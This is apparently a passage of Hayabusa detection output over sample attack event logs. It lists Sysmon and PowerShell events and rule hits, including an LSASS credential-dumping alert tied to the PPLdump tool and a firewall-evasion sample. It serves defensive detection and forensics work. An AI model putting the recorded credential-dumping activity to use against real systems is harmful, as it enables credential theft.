747F3D96-6E19-6082-0000-001070650000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7188 | Src PGUID: 747F3D96-F416-6081-0000-001033034A00 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:26.307 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: 
C:\Users\IEUser\Desktop\PPLdump.exe | PID: 6316 | PGUID: 747F3D96-F415-6081-0000-001040FE4900,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:27.649 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 424 | Src PGUID: 747F3D96-6E19-6082-0000-0010A5530000 | Tgt PID: 6972 | Tgt PGUID: 747F3D96-F417-6081-0000-0010661D4A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:27.653 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 504 | Src PGUID: 747F3D96-6E19-6082-0000-0010E5580000 | Tgt PID: 6972 | Tgt PGUID: 747F3D96-F417-6081-0000-0010661D4A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:35.260 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\lsass.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 652 | Src PGUID: 747F3D96-6E19-6082-0000-001070650000 | Tgt PID: 624 | Tgt PGUID: 747F3D96-6E19-6082-0000-0010F6600000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService 
-p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 6644 | PGUID: 747F3D96-F41F-6081-0000-001078834A00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 624 | Src PGUID: 747F3D96-6E19-6082-0000-0010F6600000 | Tgt PID: 6644 | Tgt PGUID: 747F3D96-F41F-6081-0000-001078834A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 19:09:29.667 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. 
Check the spelling of the name, or if a path was included, verify that the path is correct and try again.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.671 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again."" CommandInvocation(Get-Command): ""Get-Command""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.674 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.677 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.684 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.684 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,>,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.757 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.758 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.761 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails 
},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.762 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.762 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.762 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.763 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo 
},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.763 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.764 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,":String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException """,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.768 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.768 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; 
value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.771 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.771 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.772 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.772 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo 
},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.772 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.783 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.788 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. 
Check the spelling of the name, or if a path was included, verify that the path is correct and try again."" CommandInvocation(Get-Command): ""Get-Command""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.792 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.793 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.795 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.796 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock 
Log,>,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.944 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.944 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.947 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.947 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; 
value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.948 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.948 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.948 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.949 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; 
value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.950 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,":String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException """,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.954 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.954 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.957 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; 
value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.958 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.958 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.958 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.959 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; 
value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.976 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.980 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. 
Check the spelling of the name, or if a path was included, verify that the path is correct and try again."" CommandInvocation(Get-Command): ""Get-Command""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.985 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.994 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.998 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.999 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock 
